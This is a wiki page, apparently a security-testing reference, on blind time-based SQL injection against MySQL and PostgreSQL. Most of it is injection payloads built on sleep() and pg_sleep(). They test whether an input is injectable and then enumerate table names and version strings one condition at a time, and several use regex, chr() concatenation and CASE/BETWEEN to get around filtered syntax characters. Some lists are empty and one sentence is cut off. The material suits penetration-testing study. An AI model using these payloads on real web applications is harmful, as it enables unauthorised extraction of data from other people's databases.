Difference between revisions of "SQL injection/Blind/Timing-based boolean enumeration"
(Created page with "{{:SQL injection/Blind/Boolean/Timing}}") |
(No difference)
|
Latest revision as of 16:25, 21 November 2012
Timing attacks generally fall under two categories:
|
MySQL boolean timing attacks
MySQL's primary functions for time delay are sleep() and benchmark(). Benchmark() is actually a benchmark utility and executes a given query a number of times based on a BIGINT argument, whereas sleep() is a single query.
Benchmark() may betray the activities |
|
Evasive sleep() based boolean enumeration with regular expressions
Some information about the environment:
|
Testing for the ability to sleep():
It is very simple to test for access to the sleep() function:
%20and%20sleep(15) mysql> SELECT * FROM sample WHERE id=1 AND sleep(15); Empty set (15.00 sec)
Controlling sleep() for enumeration:Using cast() to gain control of sleep() with regex:
|
Using sleep() to map a table name with regular expressions
mysql> SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0; +------------+ | TABLE_NAME | +------------+ | sample | +------------+ 1 ROW IN SET (0.00 sec)
mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST( (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[a-m]') AS signed) * 15));
mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST( (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[n-z]') AS signed) * 15));
|
PostgreSQL Boolean Timing Attacks
pg_sleep() is the basis of both single-byte exfiltration and boolean enumeration.
Testing for access to pg_sleep()
Testing for access to pg_sleep() occurs with:
AND pg_sleep(15) IS NULL
|
Using pg_sleep() with alternative comparisons for evasive boolean enumeration
- BETWEEN ... AND ... can be used as well as the regular expression operators here.
Sleeping on true and not sleeping on false:'Similar to mysql, the database will sleep when pg_sleep([int]) is selected .'
- Using CASE to control pg_sleep with BETWEEN...AND:
AND (CASE WHEN 1 BETWEEN 1 AND 1 THEN pg_sleep(15) ELSE 9 END) IS NULL
- If the input is vulnerable, the database will sleep for 15 seconds.
- True statements will sleep, false statements will not sleep.
ascii() can be used between similar to standard PostgreSQL Boolean Enumeration here,
- True Injection:
AND (CASE WHEN ascii(SUBSTRING(version(),1,1)) BETWEEN 1 AND 255 THEN pg_sleep(5) ELSE 98923 END) IS NULL
- False Injection:
AND (CASE WHEN ascii(SUBSTRING(version(),1,1)) BETWEEN 1 AND 1 THEN pg_sleep(5) ELSE 23265 END) IS NULL
Using CASE with the ~ regular expression operator and string concatenation:
Notice that like MySQL regular expression attacks, this attack also bypasses the need for several syntax characters.
(SELECT chr(94)||chr(91)||chr(97)||chr(45)||chr(122)||chr(93))
- This should always be true, delaying the page load for an additional 15 seconds:
AND (CASE WHEN LOWER(version()) ~ (SELECT chr(94)||chr(91)||chr(97)||chr(45)||chr(122)||chr(93)) THEN pg_sleep(15) ELSE NULL END) IS NULL
- This should always be false, as PostgreSQL always capitalizes the first character, meaning no time delay should take place:
AND (CASE WHEN version() ~ (SELECT chr(94)||chr(91)||chr(97)||chr(45)||chr(122)||chr(93)) THEN pg_sleep(15) ELSE NULL END) IS NULL